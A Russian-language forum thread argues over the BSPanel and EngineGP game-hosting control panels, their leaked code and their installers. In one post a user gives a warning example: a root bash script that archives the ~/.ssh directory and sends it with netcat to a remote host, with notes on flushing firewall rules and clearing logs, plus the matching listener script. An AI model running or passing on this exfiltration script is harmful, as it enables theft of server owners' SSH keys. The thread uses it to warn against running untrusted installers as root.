Правила форума Гаранты форума
Размещение рекламы AMX-X компилятор

Здравствуйте, гость Вход | Регистрация

Наши новости:

14-дек
24-апр
10-апр
11-апр

BSPanel обсуждения ПУ

Статус пользователя RoMaNSkole
сообщение 15.2.2022, 14:39
Сообщение #1
Стаж: 13 лет

Благодарностей: 28
Полезность: < 0

Всем доброго времени, на просторах интернета нашол панель управления хостинга BsPanel, сама панель напоминает EGP v3, если кто-то сталкивался с этой панель, что можете сказать о ней. Особенно стабильно ли она работает?

Хостинг ігрових серверів - GM-HOST.COM.UA
Перейти в начало страницы         Просмотр профиля    Отправить личное сообщение
   Цитировать сообщение
Статус пользователя NKOHA
сообщение 1.8.2022, 14:45
Сообщение #2
Стаж: 3 года 11 месяцев

Благодарностей: 1
Полезность: 0

Цитата(RoMaNSkole @ 15.2.2022, 14:39) *
Всем доброго времени, на просторах интернета нашол панель управления хостинга BsPanel, сама панель напоминает EGP v3, если кто-то сталкивался с этой панель, что можете сказать о ней. Особенно стабильно ли она работает?

это и есть egp, кто-то просто сделал "ремейк".
Перейти в начало страницы         Просмотр профиля    Отправить личное сообщение
   + Цитировать сообщение
Статус пользователя Gecko
сообщение 1.8.2022, 22:42
Сообщение #3
Стаж: 7 лет 5 месяцев

Благодарностей: 520
Полезность: 345

Цитата(RoMaNSkole @ 15.2.2022, 14:39) *

EGP - знатное дерьмо, а значит всё что производное от дерьма конфеткой не может быть априори.
Уже тот факт, что они частично кодируют уствнощик говорит о многом.

НЕБОЛЬШОЙ ЛИКБЕЗ

Такие программы подразумевают коммерческое использование, и в подобных скриптах может быть всё что угодно. Linux (в широком смысле) сами по себе, очень не безопасен (точнее очень опасен), особенно если пользователь из мира Windows.

Вот простой пример что возможно делает скрипт установщика EGP

вредоносную часть скрипта можно использовать с обф***цией так, что даже опытному линуксоиду сложно будет разбираться.

Вот простейший пример скрипта запустив который, любые твои файлы улетят на удалённый сервер злоумышленника.

ЭТО ПРОСТО ПРИМЕР А НЕ РУКОВОДСТВО К ДЕЙСТВИЮ! ТАКИЕ ВЕЩИ ПОДПАДАЮТ ПОД УГОЛОВНЫЙ КОДЕКС!!!

Код
#!/bin/bash
if [ "$(whoami)" != 'root' ]; then
exit
fi

which nc >/dev/null
if [ $? -ne 0 ]; then
exit
else
echo "ok"
fi

# Злоумышленник
# Бэкапит правила интерфейса файрволла
# iptables-save -f  /tmp/iptables-config
# Обнуляет эти правила для свободного доступа
# iptables iptables -F
# После всех действий чистит логи и восстанавливает правила
# iptables-restore /tmp/iptables-config
# также может поправить /etc/ssh/sshd_config

tar czpf ${HOME}/ssh.tar.gz ${HOME}/.ssh;rip=192.168.0.14; tar cv ${HOME}/ssh.tar.gz | nc -q 0 ${rip} 443;rm -rf ${HOME}/ssh.tar.gz

Всё что нужно злоумышленнику это используя системный крон либо любым другим способом запустить на своём VPS этот скрипт:
Код
#!/bin/bash

ps aux | grep "nc -l -p 443" | grep -v "grep" > /dev/null

if [ $? -ne 0 ]; then
nc -l -p 443 | tar xv
else
exit
fi

И получать файлики с серверов ушастых ***ов на удалённый сервер.

Вот так вот всё просто. Будут серьёзные проблемы если бездумно выполнять ОТ РУТА скрипты, в том числе устанавливая пакеты с левых сайтов, а также сайтов где разработчик имеет сомнительную репутацию либо о нем вообще ничего не известно.

Такие панельки делают для ло х ов.

Если планируешь делать на аренде серверов бизнес, то закажи разработку панели.

Отредактировал: Gecko, - 2.8.2022, 3:30

Не отвечаю на ЛС.
   + Цитировать сообщение
Статус пользователя MaXaoH
сообщение 13.10.2022, 0:03
Сообщение #4
Стаж: 5 лет 10 месяцев

Благодарностей: 4

Gecko,
Цитата
Вот простой пример что возможно делает скрипт установщика EGP
вредоносную часть скрипта можно использовать с обф***цией так, что даже опытному линуксоиду сложно будет разбираться.

А причем тут EGP? Проект основан на чистом энтузиазме. Панель продавали за 35к. Позже ее слили почти со всеми исходниками, но в засраном состоянии. Энтузиасты (в том числе и я) начали приводить ее к работоспособности, добавлять модули. Проект полностью опенсурсный (в том числе и установщик. Bash код написан вручную с нуля, да так, чтобы даже начинающий понял, какую работу выполняет скрипт). Но в определенный момент заявился быдлокодер, который стал воровать буквально все идеи с EngineGP. Когда обновы перестали выпускаться, он решил нанять какого-то прогера (это стало ясно по тому, что действительно свежие обновы BSP стали писаться более чистым кодом). Помню даже, этот человек мне пытался доказать, что (дословно) "ионкуб ускоряет код". EGP же древний лишь по той причине, что уже давно доказано, что любителям халявы лишь бы поныть, что здесь эдак, тут сяк, а помощи никакой: ни финансовой, ни материальной, ни словесной, ни моральной. Даже спасибо не услышишь
Поблагодарили 1 раз
   + Цитировать сообщение
сообщение 13.10.2022, 7:51
Сообщение #5

MaXaoH,
Код
wget http://cdn.bspanel.ru/v4/bspanel.sh && less bspanel.sh

Cогласен, в данной панельке установщик менее токсичен, пробежался скриптом в общем каталоге ничего подозрительного не нашел, в отличие от EGP. Прежде чем подобное устанавливать, лично я, провел бы аудит всех файлов скачанных с сервера панельки, а также, проверил бы работу на тестовой виртуальной машине с логированием всей сетевой активности, но, с учетом того что панелька не совсем открытая, в этом скорее всего нет никакой необходимости.
Но и конечно, не один вменяемый человек не будет такое использовать в бизнесе.

Не отвечаю на ЛС.
   + Цитировать сообщение
сообщение 15.10.2022, 1:28
Сообщение #6

Gecko, а что подозрительного в EGP? Кажется, мы вообще говорим на разных языках о разных вещах. Я утверждаю, что EGP (по крайней мере та, которую многие сейчас используют - enginegp.ru) полностью открыта и чиста. Нет ни одного бекдора, направленного на взлом или другой злой умысел, как раз таки в отличие от BSP. Вот они то и убивают двух зайцев: и копейку пытаются заработать, и доступ к чужим тачкам получить
   + Цитировать сообщение
сообщение 15.10.2022, 18:22
Сообщение #7

MaXaoH, Действительно, мы говорим на разных языках, Вы даже не в курсе что в EGP закодированный bash скрипт (ищите на форуме мой пост где я приводил пример такого скрипта в ихнем установщике) который подключен в цепочке соурс основного установщика. Вопрос, зачем кодировать bash скрипт УСТАНОВЩИКА?

Я даже не хочу говорить про файлы вашего ПО под ioncube, мне это даже не интересно, я подобное никогда и не использовал. Но мне хватило глянуть на ваш установщик чтобы понять что всё остальное написано не лучшим образом, с такими установками/изменениями в системе в разы проще пойти по пути proxmox.
Вы написали никому ненужную херню, которую вообще нет смысла использовать в частных целях и критически опасно в коммерческих, потому как нету никакой гарантии и поддержки, вы вообще группа непонятных людей за которыми нету вообще ничего.

PS.
просто интересно
Код
wget http://cdn.bspanel.ru/v4/install/ALL/crontab.sh  &&  less crontab.sh

зачем это?
Код
sed -i 's/320/0/g' /etc/crontab

Отредактировал: Gecko, - 15.10.2022, 18:35

Не отвечаю на ЛС.
   + Цитировать сообщение
сообщение 15.10.2022, 18:55
Сообщение #8

MaXaoH
Цитата
EGP (по крайней мере та, которую многие сейчас используют - enginegp.ru)

Специально нашел свой пост за 23.11.2021 потому как на enginegp.ru установщик действительно чистый.
по всему остальному ИМХО
Я ни в коем случае в этой и других подобных темах не принимаю ни одну из сторон, я высказываю своё субъективное мнение как человек, который уже давно далёк от самой идеи игровых серверов.

Отредактировал: Gecko, - 15.10.2022, 18:58

Не отвечаю на ЛС.
   + Цитировать сообщение
сообщение 15.10.2022, 19:41
Сообщение #9

Gecko, а, так Вы не за того меня приняли. Я как раз таки являюсь руководителем проекта enginegp.ru, а владелец BSPanel (Залкарбек) воровал все наши реализации, накладывал свои бекдоры, кодировал все что только можно, делал привязку к сайту и продавал. Про egpv3.ru, ftpby и прочие "недопеределки" и писать нечего. Они все взяли чистую версию с моего проекта, наложили говна и впаривают школьникам, желающим открыть хостинг-однодневку. Изначально я понял, как будто все оскорбления шли в адрес моего проекта (и соответственно на меня).
Поблагодарили 1 раз
   + Цитировать сообщение
Статус пользователя sas333
сообщение 16.10.2022, 11:30
Сообщение #10

Благодарностей: 60
Полезность: 148

MaXaoH,

Вы ведь тоже далеко не ушли от того же (Залкарбек) или как там его. Взяли чужую панель и пытались там что то переделать или улучшить по вашему мнению. Если бы в своё время один человек не предоставил доступ другому человеку, который в итоге и слил панель, то и сейчас бы не было этой дискуссии и не было всяких BSPanel и так далее. Хотите сделать что то стоящее напишите с нуля, а не ковыряйте чужой код.

Хостинг игровых серверов host-v.ru
   + Цитировать сообщение
сообщение 16.10.2022, 13:24
Сообщение #11

sas333, о, это мне говорит человек, который тоже пытается продавать людям какую-то недопеределку EGP. Вы меня будете учить не делать добро людям? Покажите хоть один пост с группы, хоть одну запись на сайте или в панели, где написано что-то наподобие покупки/лицензии или попрошайничества денег. Перечитайте весь мой текст выше. Проект живет на чистом энтузиазме. Никаких денег мне не нужно. Вы сейчас чего добиваетесь своим сообщением? Поставить меня на место тем, что я якобы взял чужую панель и переделал ее? Покажите места, где она переделана. В этом и суть проекта, чтобы люди могли поставить чистую панель. Я лишь постоянно делаю фиксы (с каждым обновлением Debian, Ubuntu и прочих ОС ломается работа установщика) и оказываю поддержку по панели. (Позволю себе перейти на "ты) Ты что сделал для людей? Много заработал на платных установках и настройках панели?
Поблагодарили 1 раз
   + Цитировать сообщение
сообщение 16.10.2022, 21:46
Сообщение #12

MaXaoH,
Цитата
Вы не за того меня приняли. Я как раз таки являюсь руководителем проекта enginegp.ru

В таком случае свою критику снимаю.
Полезно указать репу проекта, сразу отпадает куча вопросов.
Краем глаза заметил что пытаетесь вписать iptables_block в rc.local не проверяя сам сервис, не факт что в дебиан rc.local запущен в systemd
время для php лучше взять так
Код
var=$(ls -n /etc | grep localtime | awk -F 'zoneinfo/' '{print $2}')

мелочей много, но в целом всё неплохо.

Отредактировал: Gecko, - 16.10.2022, 21:57

Не отвечаю на ЛС.
   + Цитировать сообщение
Статус пользователя sas333
сообщение 17.10.2022, 9:42
Сообщение #13

Благодарностей: 60
Полезность: 148

MaXaoH,
Цитата
о, это мне говорит человек, который тоже пытается продавать людям какую-то недопеределку EGP.

Тут не совсем понял, где именно я пытаюсь что то продать? Если вы про тему на форуме так это вы будите покупать не у меня а у автора данной панели. Я к этой панели никакого отношения не имею, я просто в своё время купил её у автора как и несколько других человек и не более.
Цитата
Вы меня будете учить не делать добро людям? Покажите хоть один пост с группы, хоть одну запись на сайте или в панели, где написано что-то наподобие покупки/лицензии или попрошайничества денег. Перечитайте весь мой текст выше. Проект живет на чистом энтузиазме. Никаких денег мне не нужно.

Вас не кто не учит, я просто высказал своё мнение. Это не ваше и не нужно было вам вообще туда залазить и что то делать, как писал выше, хотите сделать добро напишите своё.

Хостинг игровых серверов host-v.ru
   + Цитировать сообщение
сообщение 17.10.2022, 16:00
Сообщение #14

sas333,
Если произошла утечка в проекте, то это уже проблема разработчиков, конечному потребителю вообще пофигу кто автор. Вся эта писанина кода на самом деле ничего не стоит если нет поддержки со стороны разработчика.
Конечному потребителю вообще не важно кто у кого что украл, им главное работающий продукт который будет решать ихние задачи и по которому можно получить квалифицированную поддержку.
Совсем другое дело, если в место поддержки человек получает проблемы в виде закладок в конечном продукте, часто такое происходит по наивности и незнании.
В цифровом мире вся продукция это абстракция, начиная от самого кода и заканчивая ценником. Тут нету регуляторов и четкого рынка, ценник тут буквально берут с воздуха, есть масса проектов которые продают то, за что уже давно деньги не требуют.
К примеру проект 1 и проект 2, в первом случае/проекте деньги берут за то, что во втором случае.проекте дают абсолютно бесплатно.

Не отвечаю на ЛС.
   + Цитировать сообщение
  Ответить в данную темуНачать новую тему